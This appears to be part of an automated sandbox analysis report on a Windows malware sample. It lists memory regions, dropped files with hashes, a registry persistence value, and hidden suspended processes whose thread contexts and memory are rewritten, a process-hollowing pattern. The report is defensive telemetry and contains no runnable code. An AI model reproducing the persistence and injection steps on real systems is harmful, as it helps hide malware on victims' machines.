pagefile_0x00000000002e0000 0x002e0000 0x002e7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x0031ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000002f0000 0x002f0000 0x002f7fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000330000 0x00330000 0x00337fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000330000 0x00330000 0x00331fff Pagefile Backed Memory Readable True False False -
private_0x0000000000340000 0x00340000 0x0034ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00350000 0x0038bfff Memory Mapped File Readable False False False -
pagefile_0x0000000000350000 0x00350000 0x00357fff Pagefile Backed Memory Readable, Writable True False False -
windowsshell.manifest 0x00350000 0x00350fff Memory Mapped File Readable False False False -
index.dat 0x00350000 0x0035bfff Memory Mapped File Readable, Writable True False False -
pagefile_0x0000000000360000 0x00360000 0x00361fff Pagefile Backed Memory Readable True False False -
index.dat 0x00370000 0x00377fff Memory Mapped File Readable, Writable True False False -
index.dat 0x00380000 0x0038ffff Memory Mapped File Readable, Writable True False False -
private_0x0000000000390000 0x00390000 0x003cffff Private Memory Readable, Writable True False False -
private_0x00000000003d0000 0x003d0000 0x003d0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000003e0000 0x003e0000 0x003e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000003f0000 0x003f0000 0x003f0fff Pagefile Backed Memory Readable True False False -
wi 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000420000 0x00420000 0x0045ffff Private Memory Readable, Writable True False False -
private_0x0000000000460000 0x00460000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x00000000004a0000 0x004a0000 0x004dffff Private Memory Readable, Writable True False False -
private_0x00000000004e0000 0x004e0000 0x005dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000005e0000 0x005e0000 0x00767fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000770000 0x00770000 0x008f0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000900000 0x00900000 0x01cfffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01d00000 0x01fcefff Memory Mapped File Readable False False False -
private_0x0000000001fd0000 0x01fd0000 0x020cffff Private Memory Readable, Writable True False False -
private_0x00000000020d0000 0x020d0000 0x0221ffff Private Memory Readable, Writable True False False -
private_0x00000000020d0000 0x020d0000 0x021cffff Private Memory Readable, Writable True False False -
private_0x00000000021d0000 0x021d0000 0x021dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000021d0000 0x021d0000 0x021d7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000021d0000 0x021d0000 0x021d5fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000021e0000 0x021e0000 0x0221ffff Private Memory Readable, Writable True False False -
private_0x0000000002220000 0x02220000 0x0231ffff Private Memory Readable, Writable True False False -
private_0x0000000002320000 0x02320000 0x0241ffff Private Memory Readable, Writable True False False -
private_0x0000000002420000 0x02420000 0x0251ffff Private Memory Readable, Writable True False False -
private_0x0000000002520000 0x02520000 0x0271ffff Private Memory Readable, Writable True False False -
private_0x0000000002520000 0x02520000 0x026bffff Private Memory Readable, Writable True False False -
private_0x0000000002520000 0x02520000 0x0261ffff Private Memory Readable, Writable True False False -
private_0x0000000002620000 0x02620000 0x0265ffff Private Memory Readable, Writable True False False -
private_0x0000000002660000 0x02660000 0x0269ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000026a0000 0x026a0000 0x026a7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000026b0000 0x026b0000 0x026bffff Private Memory Readable, Writable True False False -
private_0x00000000026c0000 0x026c0000 0x026e3fff Private Memory Readable, Writable, Executable True False False -
d3a3.tmp 0x026f0000 0x026f0fff Memory Mapped File Readable True True False
private_0x0000000002710000 0x02710000 0x0271ffff Private Memory Readable, Writable True False False -
private_0x0000000002720000 0x02720000 0x0281ffff Private Memory Readable, Writable True False False -
private_0x0000000002840000 0x02840000 0x0287ffff Private Memory Readable, Writable True False False -
private_0x0000000002880000 0x02880000 0x0297ffff Private Memory Readable, Writable True False False -
private_0x0000000002980000 0x02980000 0x029bffff Private Memory Readable, Writable True False False -
private_0x00000000029c0000 0x029c0000 0x02abffff Private Memory Readable, Writable True False False -
private_0x0000000002ac0000 0x02ac0000 0x02afafff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002b00000 0x02b00000 0x02b3ffff Private Memory Readable, Writable True False False -
rasman.dll 0x6c9a0000 0x6c9b4fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x743c0000 0x743cdfff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74d60000 0x74db1fff Memory Mapped File Readable, Writable, Executable False False False -
dhcpcsvc6.dll 0x74e10000 0x74e1cfff Memory Mapped File Readable, Writable, Executable False False False -
netprofm.dll 0x74e20000 0x74e79fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x74e80000 0x74eb7fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
dhcpcsvc.dll 0x75110000 0x75121fff Memory Mapped File Readable, Writable, Executable False False False -
npmproxy.dll 0x75130000 0x75137fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x75140000 0x75145fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x75150000 0x75154fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x75160000 0x75167fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x75170000 0x751abfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x751b0000 0x751c1fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x751d0000 0x751dffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x751e0000 0x751e5fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x751f0000 0x751fffff Memory Mapped File Readable, Writable, Executable False False False -
sensapi.dll 0x75200000 0x75205fff Memory Mapped File Readable, Writable, Executable False False False -
rtutils.dll 0x75210000 0x7521cfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x75220000 0x75226fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75230000 0x75273fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x75290000 0x752a6fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x752b0000 0x752cbfff Memory Mapped File Readable, Writable, Executable False False False -
wtsapi32.dll 0x75420000 0x7542cfff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75870000 0x759a5fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x772c0000 0x773b4fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x77450000 0x7764afff Memory Mapped File Readable, Writable, Executable False False False -
normaliz.dll 0x77660000 0x77662fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 44 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\temp\d3a3.tmp 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\kft6utqw\appdata\local\temp\d3d3.tmp 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\kft6utqw\appdata\local\temp\d3d4.tmp 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\programdata\oyvgkgw.exe 328.05 KB MD5: cbe11e9a9e71737f15e8f1c606ad8d8c
SHA1: 2d4575457d337753a57b7941d13ac9665342641a
SHA256: 6e143481553f9ae7566d2245450f6fe65734b465df03e43905f0fb19f812b343
False
c:\users\kft6utqw\appdata\local\temp\d3d3.tmp 0.05 KB MD5: f82e7a2f3860bbe2226620e0a569d5bb
SHA1: 4e7c4099d0597bc28f4ffea6a00d6c44341ee04c
SHA256: b1d64604932a6676690fda7132f96766bd05ed9118247d8ab4c642e9ddbf95f2
False
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe 77.50 KB MD5: 3290d6946b5e30e70414990574883ddb
SHA1: be0144e3235ffde0787e9f1cd34c828ec87d8e19
SHA256: 0e9294e1991572256b3cda6b031db9f39ca601385515ee59f1f601725b889663
False
c:\users\kft6utqw\appdata\local\temp\d3a3.tmp 0.09 KB MD5: 373017c133fb80b96aaec222ce291d38
SHA1: 08db0aebdfd799ce29aa3086abfac8dfccc6816e
SHA256: 5571ede5f2c75cadcf4f20a7388db611cff807b47b7a564f853f2cac8af2eb04
False
c:\users\kft6utqw\appdata\local\temp\d3d4.tmp 0.11 KB MD5: 36427ecb2a0faf13af3047c51b29f9c5
SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f
SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345
False
Host Behavior
File (22)
»
Operation Filename Additional Information Success Count Logfile
Create C:\ProgramData\oyvGkGw.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create Temp File C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp path = C:\Users\kFT6uTQW\AppData\Local\Temp\ True 1
Fn
Create Temp File C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp path = C:\Users\kFT6uTQW\AppData\Local\Temp\ True 1
Fn
Create Temp File C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp path = C:\Users\kFT6uTQW\AppData\Local\Temp\ True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp type = size True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp type = size True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp type = size True 1
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Copy C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe source_filename = C:\Windows\system32\alg.exe True 1
Fn
Write C:\ProgramData\oyvGkGw.exe size = 335922 True 1
Fn
Data
Write - size = 335922 True 1
Fn
Data
Delete C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp - True 1
Fn
Delete C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp - True 2
Fn
Delete C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp - True 2
Fn
Delete C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe - True 1
Fn
Registry (1)
»
Operation Key Additional Information Success Count Logfile
Write Value - value_name = syncpack, data = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe", size = 130, type = REG_SZ True 1
Fn
Process (9)
»
Operation Process Additional Information Success Count Logfile
Create C:\ProgramData\oyvGkGw.exe os_pid = 0x64, show_window = SW_HIDE True 1
Fn
Create "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" os_pid = 0x4f4, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE True 1
Fn
Create "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" os_pid = 0x8a0, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE True 1
Fn
Create "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" os_pid = 0x728, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE True 1
Fn
Create "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" os_pid = 0x834, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE True 1
Fn
Terminate "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" exit_code = 0 False 1
Fn
Terminate "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" exit_code = 0 False 1
Fn
Terminate "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" exit_code = 0 False 1
Fn
Terminate "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" exit_code = 0 False 1
Fn
Thread (12)
»
Operation Process Additional Information Success Count Logfile
Get Context c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe os_tid = 0x878 True 1
Fn
Get Context c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe os_tid = 0x86c True 1
Fn
Get Context c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe os_tid = 0x868 True 1
Fn
Get Context c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe os_tid = 0x86c True 1
Fn
Set Context c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe os_tid = 0x878 True 1
Fn
Set Context c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe os_tid = 0x86c True 1
Fn
Set Context c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe os_tid = 0x868 True 1
Fn
Set Context c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe os_tid = 0x86c True 1
Fn
Resume c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe os_tid = 0x878 True 1
Fn
Resume c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe os_tid = 0x86c True 1
Fn
Resume c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe os_tid = 0x868 True 1
Fn
Resume c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe os_tid = 0x86c True 1
Fn
Memory (21)
»
Operation Process Additional Information Success Count Logfile
Allocate "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 True 1
Fn
Allocate "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736 True 1
Fn
Allocate "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" address = 0x2d7f898, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 47708320 True 1
Fn
Get Info "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 True 1
Fn
Get Info "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 True 1
Fn
Get Info "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 True 1
Fn
Get Info "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" address = 0x40000000, protection_out = PAGE_READWRITE, PAGE_EXECUTE_READWRITE, size_out = 0 True 1
Fn
Protect "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 114688 False 1
Fn
Protect "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 102400 True 1
Fn
Protect "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 372736 False 1
Fn
Write "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" address = 0x400000, size = 114688 True 1
Fn
Data
Write "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" address = 0x7efde008, size = 4 True 1
Fn
Data
Write "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" address = 0x7efdf010, size = 4 True 1
Fn
Data
Write "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" address = 0x400000, size = 102400 True 1
Fn
Data
Write "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" address = 0x7efde008, size = 4 True 1
Fn
Data
Write "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" address = 0x7efdf010, size = 4 True 1
Fn
Data
Write "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" address = 0x400000, size = 372736 True 1
Fn
Data
Write "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" address = 0x7efde008, size = 4 True 1
Fn
Data
Write "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" address = 0x7efdf010, size = 4 True 1
Fn
Data
Write "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" address = 0x140000000, size = 126976 True 1
Fn
Data
Write "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" address = 0x7fffffd8010, size = 8 True 1
Fn
Data
Module (96)
»
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x771c0000 True 1
Fn
Load KERNEL32.dll base_address = 0x75fb0000 True 1
Fn
Load advapi32.dll base_address = 0x77740000 True 6
Fn
Load crypt32.dll base_address = 0x76260000 True 6
Fn
Load wininet.dll base_address = 0x772c0000 True 5
Fn
Load shell32.dll base_address = 0x76480000 True 5
Fn
Load urlmon.dll base_address = 0x75870000 True 4
Fn
Load userenv.dll base_address = 0x75290000 True 3
Fn
Load wtsapi32.dll base_address = 0x75420000 True 4
Fn
Load ws2_32.dll base_address = 0x75af0000 True 1
Fn
Load mpr.dll base_address = 0x750f0000 True 1
Fn
Load netapi32.dll base_address = 0x750d0000 True 1
Fn
Load SAMCLI.DLL base_address = 0x74de0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75fb0000 True 1
Fn
Get Filename - process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 5
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fc4c True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fc8c True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x771eae5f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x77c0e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x76066aa8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75fc5a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x75fdeceb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x75fc110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75fc14e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75fc14c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75fc1809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75fc11f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75fc4f2b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x75fc359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75fc1252 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75fc4208 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75fc4d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x7604410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76044195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x75fcd31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x75fdee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x77c2441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x77c4c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x77c4c381 True 1
Fn
